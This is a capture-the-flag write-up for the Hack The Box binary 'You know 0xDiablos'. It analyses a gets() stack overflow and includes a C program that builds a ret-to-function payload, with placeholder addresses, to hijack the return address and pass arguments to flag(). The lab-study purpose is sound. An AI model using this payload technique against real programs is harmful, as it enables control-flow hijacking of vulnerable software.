HTB - You know 0xDiablos
Note: this challenge is still active as of Dec 30, 2020.
I missed my flag
By reversing the ELF x86 binary into C-pseudocode, we can find out that it contains three major functions: main, vuln and flag.
There's nothing useful in main, so we can proceed to vuln.
We can see here that vuln reads the input with gets, which is vulnerable to buffer overflow since it never checks the length of the input string.
As 184 bytes (0xB8) are allocated for s, the stack frame of vuln looks like this, from low to high addresses:
s (184 bytes) + SFP (4 bytes, the saved EBP on 32-bit x86) + RET
Any input longer than 184 bytes therefore runs over the saved frame pointer first and then the return address.
Then we see the code for flag, which seems to be the one that prints the flag:
The mechanism here is simple: just overwrite the return address of vuln with the address of flag so that flag runs when vuln returns.
But you can see here that there is one more task: we also have to control the arguments of flag, a2 among them, so that each of them matches the value it is compared against. Because flag is entered through a ret rather than a call, it takes those arguments from the stack right after the overwritten return address: first the slot flag will itself return to, then the arguments in order.
Note that for a local environment we can get past the first if statement by creating a dummy flag.txt.
Unlike the pwnable.kr bof challenge covered earlier, the difficulty here is that the comparison value is hard to find, as a2 shows up empty.
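The stack layout above fixes the shape of the input. As an added example (not the author's code, and not a solution to this challenge), here is a small C model of a 32-bit ret-to-function payload: it assumes the 184-byte buffer and 4-byte saved EBP described above, uses a made-up address for flag and made-up argument values, and simulates what flag sees once vuln's ret fires. The real distance to the return address and the real address of flag must be read from the disassembly before this is worth piping into anything.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame model from the writeup: s (184 bytes) + SFP + RET, 32-bit x86. */
#define BUF_SIZE 184u                 /* 0xB8, as allocated for s in vuln */
#define SFP_SIZE 4u                   /* saved EBP on 32-bit x86 */
#define RET_OFF  (BUF_SIZE + SFP_SIZE) /* 188: distance from s to the return address */

/* Hypothetical values for illustration only; they are not taken from the binary. */
#define FLAG_ADDR 0x080491e2u  /* assumed address of flag(); read the real one from the disassembly */
#define FAKE_RET  0x41414141u  /* where flag() "returns" to; irrelevant once the flag is printed */

/* The x86 stack is little-endian, so every 32-bit slot is written low byte first. */
static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}
static uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Build the bytes gets() would read: filler up to RET, then the frame flag() expects
 * when it is entered by a ret instead of a call: [flag addr][fake ret][a1][a2].
 * Returns the payload length, or 0 if the buffer is too small. */
size_t build_payload(uint8_t *out, size_t cap, uint32_t flag_addr, uint32_t a1, uint32_t a2) {
    size_t len = RET_OFF + 4 * 4;
    if (cap < len) return 0;
    memset(out, 'A', RET_OFF);              /* fills s and the saved EBP */
    put_le32(out + RET_OFF,      flag_addr); /* overwrites vuln's return address */
    put_le32(out + RET_OFF + 4,  FAKE_RET);  /* slot flag() will pop when it returns */
    put_le32(out + RET_OFF + 8,  a1);        /* first argument of flag() */
    put_le32(out + RET_OFF + 12, a2);        /* second argument of flag() */
    return len;
}

/* gets() stops at '\n' (0x0a), so an address or value containing that byte
 * cannot be delivered in one line; this check catches it before sending. */
int contains_newline(const uint8_t *p, size_t n) {
    for (size_t i = 0; i < n; i++) if (p[i] == '\n') return 1;
    return 0;
}

/* Model of vuln's `leave; ret` with `stack` being the memory that starts at s
 * after the payload has been copied in. ret pops the 4 bytes at RET_OFF into EIP
 * and leaves ESP just above them; under cdecl the callee then finds its first
 * argument at [ESP+4] and its second at [ESP+8]. */
struct callee_view { uint32_t eip, a1, a2; };

struct callee_view simulate_ret(const uint8_t *stack) {
    struct callee_view v;
    size_t esp = RET_OFF;
    v.eip = get_le32(stack + esp); esp += 4; /* ret: EIP = [ESP], ESP += 4 */
    v.a1  = get_le32(stack + esp + 4);       /* what flag() reads as a1 */
    v.a2  = get_le32(stack + esp + 8);       /* what flag() reads as a2 */
    return v;
}

int main(void) {
    uint8_t payload[256];
    size_t n = build_payload(payload, sizeof payload, FLAG_ADDR, 0x11111111u, 0x22222222u);
    if (n == 0 || contains_newline(payload, n)) {
        fputs("payload unusable: too long or contains 0x0a, which gets() treats as end of line\n", stderr);
        return 1;
    }
    fwrite(payload, 1, n, stdout); /* e.g. ./build | ./vuln against a local copy */
    return 0;
}
```

The simulation is the part worth internalising: after the ret, flag never executed a call, so the word directly after its own address is treated as its return address and the two words after that as a1 and a2. Getting this order wrong shifts every argument by one slot, which is the usual reason a ret-to-function payload lands in flag but fails the comparison.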
Again, the TOS of Hackthebox indicate that users are not allowed to share solutions, so this is all I could write.
But I can give you a simple hint: the second operand of && in an if statement is evaluated only if the first one is true.
Good luck :D